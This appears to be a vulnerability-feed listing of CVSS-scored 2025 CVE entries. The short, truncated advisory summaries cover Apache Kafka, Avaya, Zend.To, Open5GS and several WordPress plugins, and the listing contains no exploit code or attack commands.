7.5
CVE-2025-27819 - Apache Kafka: Possible RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration
In CVE-2023-25194, we announced the RCE/Denial of service attack via SASL JAAS JndiLoginModule configuration in Kafka Connect API. But not only Kafka Connect API is vulnerable to this attack, the Apache Kafka brokers also have this vulnerability. To exploit this vulnerability, the attacker needs toโฆ
8.8
CVE-2025-27818 - Apache Kafka: Possible RCE attack via SASL JAAS LdapLoginModule configuration
A possible security vulnerability has been identified in Apache Kafka. This requires access to a alterConfig to theย cluster resource, or Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which โฆ
0.0
CVE-2025-5945 -
This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.
9.9
CVE-2025-1041 - Avaya Call Management System RCE vulnerability
An improper input validation discovered in Avaya Call Management System could allow an unauthorized remote command via a specially crafted web request. Affected versions include 18.x, 19.x prior to 19.2.0.7, and 20.x prior to 20.0.1.0.
8.8
CVE-2025-4954 - Axle Demo Importer <= 1.0.3 - Author+ Arbitrary File Upload
The Axle Demo Importer WordPress plugin through 1.0.3 does not validate files to be uploaded, which could allow authenticated users (author and above) to upload arbitrary files such as PHP on the server
7.5
CVE-2025-4840 - Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection
The inprosysmedia-likes-dislikes-post WordPress plugin through 1.0.0 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
6.9
CVE-2025-5952 - Zend.To NSSDropoff.php exec os command injection
A vulnerability, which was classified as critical, has been found in Zend.To up to 6.10-6 Beta. This issue affects the function exec of the file NSSDropoff.php. The manipulation of the argument file_1 leads to os command injection. The attack may be initiated remotely. The exploit has been discloseโฆ
6.9
CVE-2025-5935 - Open5GS AMF/MME emm-sm.c common_register_state denial of service
A vulnerability was found in Open5GS up to 2.7.3. It has been declared as problematic. Affected by this vulnerability is the function common_register_state of the file src/mme/emm-sm.c of the component AMF/MME. The manipulation of the argument ran_ue_id leads to denial of service. The attack can beโฆ
6.4
CVE-2025-3076 - Elementor Pro <= 3.29.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
The Elementor Website Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the โbutton_textโ parameter in all versions up to, and including, 3.29.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contrโฆ
8.8
CVE-2025-4601 - RH - Real Estate WordPress Theme <= 4.4.0 - Authenticated (Subscriber+) Privilege Escalation
The "RH - Real Estate WordPress Theme" theme for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 4.4.0. This is due to the theme not properly restricting user roles that can be updated as part of the inspiry_update_profile() function. This makes it possible forโฆ